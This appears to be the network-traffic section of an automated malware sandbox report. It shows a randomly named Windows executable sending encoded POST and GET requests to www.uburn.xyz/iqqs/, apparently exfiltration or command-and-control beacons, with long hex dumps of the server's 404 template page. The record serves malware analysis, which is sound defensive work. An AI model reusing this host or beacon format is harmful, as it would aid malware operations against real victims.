                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.uburn.xyz
                          Origin: http://www.uburn.xyz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.uburn.xyz/iqqs/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 36 68 73 63 39 2b 2f 34 38 77 71 70 4e 73 4b 50 54 32 6d 32 64 47 4a 2f 6e 73 51 54 79 62 57 4f 4e 53 72 6d 31 39 74 38 66 70 6f 41 73 68 54 2f 43 65 67 4d 7a 59 2b 65 66 70 77 46 5a 62 4d 31 50 51 66 43 6e 2b 4d 6c 42 53 77 2b 35 6a 31 73 41 6e 69 43 72 2b 42 41 34 57 36 61 47 68 45 6e 46 2b 55 6d 73 68 58 48 56 43 71 72 68 6e 5a 30 55 50 6d 4d 68 30 54 4f 2b 66 6e 51 37 49 72 44 68 63 45 6e 66 38 65 57 59 43 69 47 6e 32 68 74 6f 4e 6d 69 57 33 43 32 31 34 72 65 4c 38 76 31 6d 34 4c 44 42 61 4c 32 58 58 45 77 69 6e 61 75 75 6c 45 57 76 72 79 75 65 36 65 50 4a 66 6d 53 32 73 30 45 33 4c 4c 72 63 49 3d
                          Data Ascii: 3jE8o=S5nO3ybs7ms6T6hsc9+/48wqpNsKPT2m2dGJ/nsQTybWONSrm19t8fpoAshT/CegMzY+efpwFZbM1PQfCn+MlBSw+5j1sAniCr+BA4W6aGhEnF+UmshXHVCqrhnZ0UPmMh0TO+fnQ7IrDhcEnf8eWYCiGn2htoNmiW3C214reL8v1m4LDBaL2XXEwinauulEWvryue6ePJfmS2s0E3LLrcI=
                          Sep 23, 2024 14:54:45.623512030 CEST1236INHTTP/1.1 404 Not Found
                          Date: Mon, 23 Sep 2024 12:54:45 GMT
                          Server: Apache
                          X-Frame-Options: SAMEORIGIN
                          Content-Length: 32106
                          X-XSS-Protection: 1; mode=block
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                          Sep 23, 2024 14:54:45.623697996 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                          Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                          Sep 23, 2024 14:54:45.623733997 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                          Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                          Sep 23, 2024 14:54:45.623769999 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                          Sep 23, 2024 14:54:45.623806000 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                          Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                          Sep 23, 2024 14:54:45.624218941 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                          Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                          Sep 23, 2024 14:54:45.624274015 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                          Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                          Sep 23, 2024 14:54:45.624309063 CEST1236INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                          Sep 23, 2024 14:54:45.624341965 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 34 3c 2f 61 3e 0a
                          Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 4</a> <ul class="dropdown-menu"> <li><a class="drop
                          Sep 23, 2024 14:54:45.624377966 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 35 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e
                          Data Ascii: <li><a class="dropdown-item" href="header5-dark.html">Header 5 Dark</a></li> </ul> </li>
                          Sep 23, 2024 14:54:45.629267931 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 46 6f 6f 74 65 72 31 2d 6c 69 67 68 74 2e 68 74 6d 6c
                          Data Ascii: <li><a class="dropdown-item" href="Footer1-light.html">Footer 1 Light</a></li> <li><a class="dropdown-item" href="Footer1-dark.html">Footer 1 Dark</a></li


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.44974567.223.117.189802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:47.606858015 CEST10813OUTPOST /iqqs/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.uburn.xyz
                          Origin: http://www.uburn.xyz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.uburn.xyz/iqqs/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 36 68 73 63 39 2b 2f 34 38 77 71 70 4e 73 4b 50 54 32 6d 32 64 47 4a 2f 6e 73 51 54 79 44 57 4f 65 4b 72 30 43 4a 74 37 66 70 6f 4e 4d 68 57 2f 43 65 48 4d 7a 67 36 65 66 74 4b 46 66 66 4d 30 73 49 66 4c 32 2b 4d 79 78 53 77 33 5a 6a 34 68 67 6d 2f 43 71 53 46 41 34 6d 36 61 47 68 45 6e 47 6d 55 69 39 68 58 4c 31 43 74 6f 68 6e 64 2b 30 4f 50 4d 6c 59 74 4f 39 79 61 51 4c 6f 72 44 42 73 45 72 4e 55 65 55 34 43 67 53 48 33 6d 74 6f 78 50 69 57 71 39 32 31 6c 4d 65 4c 59 76 30 67 77 49 54 43 43 64 72 55 65 59 7a 44 4c 50 76 4d 78 79 51 4f 66 39 6f 50 57 70 58 39 72 7a 4a 30 64 62 64 47 66 4c 35 4a 7a 32 41 74 6c 33 70 36 39 6f 76 6f 6d 4a 32 71 35 62 68 76 4f 36 46 6f 53 53 47 7a 4b 72 52 74 62 4d 63 32 57 2f 6a 73 65 63 6c 63 6e 2b 49 74 31 46 49 73 5a 65 50 38 75 6f 73 69 5a 7a 2f 76 66 70 56 77 2f 79 34 4b 75 43 31 37 63 72 45 56 43 59 4a 42 70 31 6d 79 4a 66 52 4d 61 53 4e 6c 42 69 54 49 59 31 61 2f 32 66 55 64 4c 37 55 58 43 6a 31 46 31 55 [TRUNCATED]
                          Data Ascii: 3jE8o=S5nO3ybs7ms6T6hsc9+/48wqpNsKPT2m2dGJ/nsQTyDWOeKr0CJt7fpoNMhW/CeHMzg6eftKFffM0sIfL2+MyxSw3Zj4hgm/CqSFA4m6aGhEnGmUi9hXL1Ctohnd+0OPMlYtO9yaQLorDBsErNUeU4CgSH3mtoxPiWq921lMeLYv0gwITCCdrUeYzDLPvMxyQOf9oPWpX9rzJ0dbdGfL5Jz2Atl3p69ovomJ2q5bhvO6FoSSGzKrRtbMc2W/jseclcn+It1FIsZeP8uosiZz/vfpVw/y4KuC17crEVCYJBp1myJfRMaSNlBiTIY1a/2fUdL7UXCj1F1UYjhgy8nm01FX41Mm/wkzcF4LUfX0JX6GJnOXWb8iASPOv5ar96ZYiE/PymJURk/2lEINn2KrciDjvN9gg3AbEnUpD6s4Dp60+J3uiQyOIuH/GKNrUBH9+21Fsy00Tu99KUEws/5fOlDACjtsjBsKkudkS7W2cKQuw6/FOUINzPR97lhJwOVM+K6g66r/vIrYNTtnJViw2ez8yFd5BKrx13gWzLcvMP/ip2yGMTMVR2Nm6qEH7gU1Hn9MehgtnFclmUZX3doGXGybSHhg0ITh7McLWIc7tmf/AXXKH8IR8seUfNJSWYn1hOfO0+giDio0NQWKMDA3HEyHhvDZNgW4p/Ktg4iIO6hfc7ngnBrOWHw/qk4hdZlJhb3CgiFPsiubW1uOGoFJdu8SJCGlVHG6Y2ePOiom/H7puaw6n0Bw+FwpamGe0594VYwxsMVG/TBaAP35+vwHQa54MYmlxhoXX4r4nzGhCNf0XR9l3he6eYRpTLPPHbVhz0rN/R/TW2XohdvRGO1cRmqr59ZbO7zzoUMrUS+llnik7vVufCilRveoZeGs7TGxCT0EdBWvugK0OHCxBneyL/vAAYC5InxHq02AniCQgg4U33/P0dvmTE4bjmrHoT4dFNmkJiUqr3p66URwHtnxdfDwn6XPOv7HqRLQfpvznlrJhY [TRUNCATED]
                          Sep 23, 2024 14:54:48.268166065 CEST1236INHTTP/1.1 404 Not Found
                          Date: Mon, 23 Sep 2024 12:54:48 GMT
                          Server: Apache
                          X-Frame-Options: SAMEORIGIN
                          Content-Length: 32106
                          X-XSS-Protection: 1; mode=block
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                          Sep 23, 2024 14:54:48.268198967 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                          Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                          Sep 23, 2024 14:54:48.268217087 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                          Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                          Sep 23, 2024 14:54:48.268234015 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                          Sep 23, 2024 14:54:48.268251896 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                          Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                          Sep 23, 2024 14:54:48.268265963 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 6f 6d 65 32 2e 68 74 6d 6c 22 3e 48 6f 6d 65 20 32 3c 2f 61 3e 3c 2f
                          Data Ascii: <li><a class="dropdown-item" href="home2.html">Home 2</a></li> <li><a class="dropdown-item" href="home3.html">Home 3</a></li> <li><a
                          Sep 23, 2024 14:54:48.268311024 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 31 2d 74 72 61 6e 73 70 61 72 65 6e 74
                          Data Ascii: <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a class="dropdown-item" href="header1-light.html">Header 1
                          Sep 23, 2024 14:54:48.268328905 CEST108INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: </ul> </li
                          Sep 23, 2024 14:54:48.268341064 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                          Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                          Sep 23, 2024 14:54:48.268363953 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                          Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                          Sep 23, 2024 14:54:48.273324013 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.44974667.223.117.189802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:50.145806074 CEST453OUTGET /iqqs/?oB=mVppHlHxM&3jE8o=f7Pu0FXPylRYdptkWs+23MtWxvoKJz6PgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb4laqx4Tc9G/2Lb24L4CzfFNZpkDBhe90DBs= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.uburn.xyz
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:54:50.714366913 CEST1236INHTTP/1.1 404 Not Found
                          Date: Mon, 23 Sep 2024 12:54:50 GMT
                          Server: Apache
                          X-Frame-Options: SAMEORIGIN
                          Content-Length: 32106
                          X-XSS-Protection: 1; mode=block
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                          Sep 23, 2024 14:54:50.714415073 CEST1236INData Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                          Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL
                          Sep 23, 2024 14:54:50.714448929 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e
                          Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="
                          Sep 23, 2024 14:54:50.714479923 CEST1236INData Raw: 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68
                          Data Ascii: mg src="assets/custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/ima
                          Sep 23, 2024 14:54:50.714513063 CEST896INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e
